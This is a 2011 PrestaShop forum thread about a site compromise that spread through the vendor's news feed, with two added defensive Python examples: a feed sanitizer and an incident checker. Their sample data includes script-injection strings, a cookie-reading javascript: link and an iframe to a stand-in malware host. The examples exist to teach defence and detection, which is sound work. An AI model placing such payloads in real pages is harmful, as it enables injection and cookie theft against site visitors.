Xenocide Posted August 24, 2011 Share Posted August 24, 2011 The vunerbility delivered a payload of a malware site in an iframe on the "front office" section of your site so it's possible something was installed on anyone's machine who was visiting your site. Edit: vv It's been confirmed to have been the RSS feed in the admin panel loaded from prestashop.com vv Link to comment Share on other sites More sharing options...
dazzza Posted August 24, 2011 Share Posted August 24, 2011 It seems to have only affected 1.4.3 & 1.4.4 so it must of been something that was added in 1.4.3 "Add my IP" or Layered module #################################### # v1.4.3.0 - 7119 (2011-06-16) # #################################### Added Features: [+] Installer : Refuse to index the page by robots [+] BO : Added button "Add my IP" [+] BO : Adding pagination to the customers list [+] BO : added the option to move product images to the new filesystem [+] Classes : added manufacturer name and id in ProductSale::getBestSales(); [+] Classes : added manufacturer name and id in ProductSale::getBestSales(); without sql error [+] MO : MondialRelay, add fields personalization and fix js [+] MO : Refactoring Module dejala and LiveZilla [+] MO : layered module - real time URL building (ability to give the URL to someone) Link to comment Share on other sites More sharing options...
Julien Breux Posted August 24, 2011

It's just a little tool to help you. https://github.com/jbreux/psauditor/
indus Posted August 24, 2011

Ok, I notice one problem now: my theme does not appear in backoffice > appearance > themes. Anyone else have this problem?
designguy79 Posted August 24, 2011

Has anyone who sent a request to [email protected] received more details yet? I sent them a message about 3 1/2 hours ago and have not heard anything!
GTSTech Posted August 24, 2011

I've not had a reply either, designguy79. I think they're taking precautions since the hacker could be on the forum and could potentially find a way around their fix!! Is there any way to disable the PrestaShop news feed appearing in our backend, as I read in this thread that it had something to do with the hack being downloaded in the first place.
istox Posted August 24, 2011

I have not received an answer for 6 hours. Please can someone say how to disable the link to prestashop.com from the back office? Because when prestashop.com is down, your back office will be down too.
indus Posted August 24, 2011

I have not received an answer for 6 hours. Please can someone say how to disable the link to prestashop.com from the back office? Because when prestashop.com is down, your back office will be down too.

Same here. Haven't received any email. Maybe they should email every member on the forum. Some of them might still not have noticed.
Nebojsa Stojanovic Posted August 24, 2011

Hi, We'll post the procedure and the fix in a few minutes. I'll update you very soon. Regards
fancydressqueen Posted August 24, 2011

Hi, We'll post the procedure and the fix in a few minutes. I'll update you very soon. Regards

Excellent, thanks for the update....on the update...if that makes sense.
Ehinarr Posted August 24, 2011

In my particular case, all these files and modifications appeared after I enabled the webservice. Is that relevant? Anyway, just in case, I have disabled the webservice.
shacker Posted August 24, 2011

You can remove, in admintabs.php in the tabs folder of admin, the entire column div <div id="column_right"> on lines 389 to 429.
chemapresta Posted August 24, 2011

It seems to have only affected 1.4.3 & 1.4.4, so it must have been something that was added in 1.4.3: "Add my IP" or the Layered module

####################################
# v1.4.3.0 - 7119 (2011-06-16) #
####################################
Added Features:
[+] Installer : Refuse to index the page by robots
[+] BO : Added button "Add my IP"
[+] BO : Adding pagination to the customers list
[+] BO : added the option to move product images to the new filesystem
[+] Classes : added manufacturer name and id in ProductSale::getBestSales();
[+] Classes : added manufacturer name and id in ProductSale::getBestSales(); without sql error
[+] MO : MondialRelay, add fields personalization and fix js
[+] MO : Refactoring Module dejala and LiveZilla
[+] MO : layered module - real time URL building (ability to give the URL to someone)

No, I'm using PS v1.4.1.0 and I am also affected.
dazzza Posted August 24, 2011

It seems to have only affected 1.4.3 & 1.4.4, so it must have been something that was added in 1.4.3: "Add my IP" or the Layered module

####################################
# v1.4.3.0 - 7119 (2011-06-16) #
####################################
Added Features:
[+] Installer : Refuse to index the page by robots
[+] BO : Added button "Add my IP"
[+] BO : Adding pagination to the customers list
[+] BO : added the option to move product images to the new filesystem
[+] Classes : added manufacturer name and id in ProductSale::getBestSales();
[+] Classes : added manufacturer name and id in ProductSale::getBestSales(); without sql error
[+] MO : MondialRelay, add fields personalization and fix js
[+] MO : Refactoring Module dejala and LiveZilla
[+] MO : layered module - real time URL building (ability to give the URL to someone)

No, I'm using PS v1.4.1.0 and I am also affected.

Thanks for that chemapresta. I didn't realise it went back that far, I'll have to dig a bit deeper.
chemapresta Posted August 24, 2011

Has anyone who sent a request to [email protected] received more details yet? I sent them a message about 3 1/2 hours ago and have not heard anything!

Nothing yet.
Ehinarr Posted August 24, 2011

And deleted all new files...
dazzza Posted August 24, 2011

I've left the files in place on a project I'm working on for a client. Now if the hacker knows the admin address of the site & the login details & tries to access it, when they hit "log in", instead of logging in, it sends them a virus.
tobes Posted August 24, 2011

It seems to have only affected 1.4.3 & 1.4.4, so it must have been something that was added in 1.4.3: "Add my IP" or the Layered module

No, I'm using PS v1.4.1.0 and I am also affected.

1.4.2.5 for me on both my sites. I too am waiting to hear back from the support email address.
Adalid_Negro Posted August 24, 2011

I've left the files in place on a project I'm working on for a client. Now if the hacker knows the admin address of the site & the login details & tries to access it, when they hit "log in", instead of logging in, it sends them a virus.

Just change the name of the administrator folder... www.promutual-eat.com/s/
dazzza Posted August 24, 2011

My PrestaShop 1.5 test site seems to be unaffected so far. Checked footer.tpl, smarty files, modules, database & apache logs. Nothing.
indus Posted August 24, 2011

..........
Mike Kranzler Posted August 24, 2011

Hello everybody,

First of all, thank you for your information and knowledge as we worked on closing this hole. We have officially secured this footer.tpl vulnerability and created a guide for quickly and easily fixing it in your shop. You can find that guide here: http://www.prestashop.com/forums/topic/126114-please-read-security-procedure/

Again, thank you so much for your patience as we researched and applied this fix. The information you posted and emailed to us was invaluable when it came to speeding up the process. If you have any additional questions, please do not hesitate to email us, but please be sure to try our suggestions here first.

Thanks again, and happy selling!

-Mike
thehandlestudio Posted August 24, 2011

Thank you Mike. Regards, Mark.
plextor-online Posted August 24, 2011

thx Prestashop team for your hard work to fix this problem...
geckoWebdesign Posted August 24, 2011

Thank you! Merci (thank you)!
fireman28 Posted August 24, 2011

Thanks!! My Avast Antivirus has been giving warnings for a couple of weeks, and it is now that I realise what was going on. Won't ignore it again!! I thought I had messed up my theme yesterday when all carousels and a slider went mad.

I wonder why a news service was capable of giving access to download files and who knows what else... perhaps we should be allowed to opt out in the future? Apart from money, we are losing credibility with our customers.

Does anybody know what the intention of such a hack was? What did the injected code do?

I thank again for everybody's efforts to bring this under control. Al
PurpleEdge Posted August 24, 2011

If prestashop.com is infected, maybe the problem comes from the back office, which contacts some PrestaShop URLs.

This is actually not a bad assessment as to what may have been wrong, seeing the prevalence of the localhost infections. Even if it was not, there are at least half a dozen places in the code where content from prestashop.com is pulled, and every single installation out there is at the mercy of the security of prestashop.com and its subdomains. I understand the wish to collect stats/referrer points/affiliate credits etc., but PrestaShop should seriously reconsider including code that pulls stuff from other domains, including their own. Any security-conscious admin removes those sections from the code as soon as it is installed anyway. The alternative is that a situation like this one may arise anytime. Just my two cents.

I agree 100% - this is a perfect example of the risk. Contacting head office for the latest news seems like a neat feature in a CMS, but it is obviously a feature which requires constant vigilance. Congratulations to PS for identifying the cause so quickly - now to prevent it happening again!
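The design point made in this post, that content pulled from the vendor's site must be treated like any other untrusted input, can be shown in a few lines. The example below is added here and is not PrestaShop's code (the back office is PHP; Python is used only to illustrate the principle): it parses a constructed RSS document whose second item carries an injected tag and a non-http link, uses only allowlisted fields, HTML-escapes every text field, accepts links only with an http(s) scheme, and bounds the number and length of items. The feed text, URLs and hostnames are constructed for the example.

```python
"""Render a remote news feed as untrusted data.

Added illustration of the design point made in this thread: content pulled
from the vendor's site (or any other host) must be treated like user input
before it is placed into an admin page.  This is an added example, not
PrestaShop's own code.  The feed text is constructed for the example.
"""
import html
import xml.etree.ElementTree as ET  # for real feeds prefer defusedxml to resist entity attacks
from urllib.parse import urlparse

# Constructed RSS document: the second item carries an injected tag in its
# title and description and a non-http link.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel>
  <item>
    <title>PrestaShop 1.4.4 released</title>
    <link>https://www.prestashop.com/blog/</link>
    <description>Bug fixes and new features.</description>
  </item>
  <item>
    <title>Update now &lt;script&gt;alert(1)&lt;/script&gt;</title>
    <link>javascript:alert(document.cookie)</link>
    <description>&lt;iframe src="http://malware.example/"&gt;&lt;/iframe&gt;</description>
  </item>
</channel></rss>"""

ALLOWED_SCHEMES = {"http", "https"}
MAX_ITEMS = 5    # bound the amount of remote content rendered
MAX_TEXT = 200   # bound the length of each text field


def safe_link(raw):
    """Return the link only if it is an absolute http(s) URL, else None."""
    if raw is None:
        return None
    parsed = urlparse(raw.strip())
    if parsed.scheme.lower() not in ALLOWED_SCHEMES or not parsed.netloc:
        return None
    return parsed.geturl()


def safe_text(raw):
    """Strip, truncate and HTML-escape a text field so it can only render as text."""
    text = (raw or "").strip()[:MAX_TEXT]
    return html.escape(text, quote=True)


def render_feed(xml_text):
    """Parse an RSS feed and return safe HTML list items (one string per item).

    Only allowlisted fields (title, link, description) are used; text is
    escaped, links are scheme-checked, and the item count is bounded.
    """
    root = ET.fromstring(xml_text)
    rows = []
    for item in root.iter("item"):
        if len(rows) >= MAX_ITEMS:
            break
        title = safe_text(item.findtext("title"))
        desc = safe_text(item.findtext("description"))
        link = safe_link(item.findtext("link"))
        if link:
            rows.append(f'<li><a href="{html.escape(link, quote=True)}">{title}</a> {desc}</li>')
        else:
            rows.append(f"<li>{title} {desc}</li>")
    return rows


if __name__ == "__main__":
    for row in render_feed(SAMPLE_FEED):
        print(row)
```

The escaping is what matters: the injected `<script>` and `<iframe>` survive only as literal text, and the `javascript:` link is dropped rather than rendered. Fetching the feed over HTTPS with certificate verification, and failing closed when the feed is unreachable, are the complementary transport-side measures.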
PurpleEdge Posted August 24, 2011

It's just a little tool to help you. https://github.com/jbreux/psauditor/

Hi Julien, Can you please post a little bit more information about what this is and how to use it?
feltu Posted August 25, 2011

Dear Prestashop Team, thank you for fixing the problem. The hack has cost us a lot of trouble on our 2 PrestaShop sites. I need to know some extra information.
- Is the 1.4.4 version safe to upgrade to?
- Will there be a new 1.4.x upgrade coming soon that covers this problem?
- Are we still safe to use the Upload function from the contact form after applying the herfix patch?
- Is there any chance that the password that we entered under the PayPal module has been sent to the hacker too?
- Are the email / personal info from the customer database being sent to the hacker?

We need to know the answers to the above urgently. Thank you, Cyril
Takada Posted August 25, 2011

Hello, Something's missing: what is the risk for people who were infected on their local install? As there often is no password for MySQL...
goodboy88 Posted August 25, 2011

Me too, I got infected. How can they upload or inject that code on my server since it is password protected? Anyone know?
makaraci Posted August 25, 2011

Hi guys, I use the 1.3.1 version of PrestaShop. I wonder if my site may be infected?
Carl Favre Posted August 25, 2011

Hi makaraci, It only concerns 1.4.x versions of PrestaShop.
makaraci Posted August 25, 2011

Hi makaraci, It only concerns 1.4.x versions of PrestaShop.

Thanks Carl. I'm relaxed.
Nebojsa Stojanovic Posted August 25, 2011

Hi everybody,

First of all, I want to thank the PrestaTeam and the Community who were able to mobilize yesterday to correct the problem in just a few short hours. I took the time to read each and every one of your posts, and I want to bring you as much information as possible in answer to all your questions.

As soon as we became aware of the fault, we began by searching for the origin. We contacted several storefront owners who had found the problem, they gave us access, and together we tried to reproduce it on multiple machines in-house. We identified several possibilities:
- A security vulnerability in the PrestaShop software that allowed the injection of malicious script on the shops.
- A trojan that modifies the script before sending by FTP.
- A trojan recovering FTP access and allowing another script to change the solution.
- A security vulnerability in the software on the servers.

And we finally managed to find the answer: the issue was with our website, www.prestashop.com. So we started by correcting the problem on prestashop.com, blocking the attack, and then we split the team in three:
- A team to more precisely analyze what the script was exactly, to assess the damage;
- A team to create the sets, and test it on several shops affected;
- Another team was responsible for verifying the PrestaShop server in depth, to lock the server and trace it back to the origin of the hack to recover as much information as possible so that we can file an official report.

- Yes, www.PrestaShop.com has been compromised, allowing an attacker to exploit a script injection on the site and, as a result, another script on the remote stores.
- This "loophole" exists because we do not verify information from our own site in terms of the software. This design flaw is fixed with the patch that we provided you yesterday. This patch fixes the problem and protects your store from future attacks.
- The software is completely secure as I am writing this, and the malicious script was offset yesterday afternoon around 7:00 a.m. Eastern Time.
- The consequences for the shops affected are: The script got your access to the database and a table "Employees", and sent it by mail to an anonymous address, which is why we have asked you to change the password for your database and the password for all your employees in the back office of your store. The script added several points of entry ("backdoors") in the download and upload directories, to browse the directory of your store; these scripts are deleted by the patch. The script removed the directory tools/smarty_v2; this directory is recreated by the patch. The direct consequence is, for now, a temporary suspension of your site, until the application of security patches.
- What to do: it is essential to quickly apply the security patch if you have been affected, because data is still vulnerable. If you have not been affected, you should apply the security patch as a preventative measure.

The whole PrestaShop team is listening to you and we are at your disposal for any questions. We are actively working to respond to you individually today to help resolve any problems.

Yours.
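The consequences listed in the post above translate directly into an on-disk checklist. As an added example (not PrestaShop's patch, which the guide linked earlier in the thread describes), the script below walks a shop root and reports the traces the thread names: modules/her.php, PHP files under upload/ and download/, the missing tools/smarty_v2 directory, and an injected iframe tag in a theme's footer.tpl. The directory layout is assumed from the thread; `demo()` builds a constructed infected tree in a temporary directory so the check can be run offline, and the placeholder file names and hostname in it are constructed.

```python
"""Post-incident filesystem check for the indicators described in this thread.

Added example, not PrestaShop's patch: it walks a shop root and reports the
on-disk traces the thread lists.  The directory layout (modules/, upload/,
download/, tools/smarty_v2, themes/<name>/footer.tpl) is assumed from the
thread.  demo() creates a constructed tree; nothing in it is real malware.
"""
import os
import re
import shutil
import tempfile

IFRAME_RE = re.compile(r"<iframe\b", re.IGNORECASE)


def check_shop(root):
    """Return a list of (severity, message) findings for the shop rooted at `root`."""
    findings = []

    her = os.path.join(root, "modules", "her.php")
    if os.path.isfile(her):
        findings.append(("high", f"dropped module present: {her}"))

    for sub in ("upload", "download"):
        d = os.path.join(root, sub)
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if name.lower().endswith(".php"):
                findings.append(("high", f"PHP file in {sub}/: {os.path.join(d, name)}"))

    if not os.path.isdir(os.path.join(root, "tools", "smarty_v2")):
        findings.append(("medium", "tools/smarty_v2 is missing (restore from a clean copy)"))

    themes = os.path.join(root, "themes")
    if os.path.isdir(themes):
        for theme in sorted(os.listdir(themes)):
            footer = os.path.join(themes, theme, "footer.tpl")
            if os.path.isfile(footer):
                with open(footer, "r", encoding="utf-8", errors="replace") as fh:
                    if IFRAME_RE.search(fh.read()):
                        findings.append(("high", f"iframe tag in {footer}"))
    return findings


def has_high(findings):
    """True when at least one finding is rated high."""
    return any(sev == "high" for sev, _ in findings)


def demo():
    """Build a constructed infected tree in a temp dir, check it, clean up, return findings."""
    root = tempfile.mkdtemp(prefix="shop_")
    try:
        os.makedirs(os.path.join(root, "modules"))
        open(os.path.join(root, "modules", "her.php"), "w").close()
        os.makedirs(os.path.join(root, "upload"))
        with open(os.path.join(root, "upload", "placeholder.php"), "w") as fh:
            fh.write("<?php /* constructed placeholder, does nothing */ ?>")
        os.makedirs(os.path.join(root, "download"))
        os.makedirs(os.path.join(root, "themes", "mytheme"))
        with open(os.path.join(root, "themes", "mytheme", "footer.tpl"), "w") as fh:
            fh.write('</div>\n<iframe src="http://malware.example/"></iframe>\n')
        # tools/smarty_v2 is deliberately absent, as the post describes.
        return check_shop(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


def demo_clean():
    """Check a constructed clean tree (only tools/smarty_v2 present); expect no findings."""
    root = tempfile.mkdtemp(prefix="shop_clean_")
    try:
        os.makedirs(os.path.join(root, "tools", "smarty_v2"))
        return check_shop(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for sev, msg in check_shop(sys.argv[1]):
            print(f"[{sev}] {msg}")
    else:
        for sev, msg in demo():
            print(f"[{sev}] {msg}")
```

Run `python check_shop.py /path/to/shop` against a real install; a clean result from this script only covers the traces named in the thread, so the password changes the post asks for still apply.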
Mike Kranzler Posted August 25, 2011

Thank you Nebosja, I know you and the rest of the team have worked very hard on this. I am going to close this thread, but for any additional questions or comments you may have, please visit the thread where we have published the fix, which you can find here.

-Mike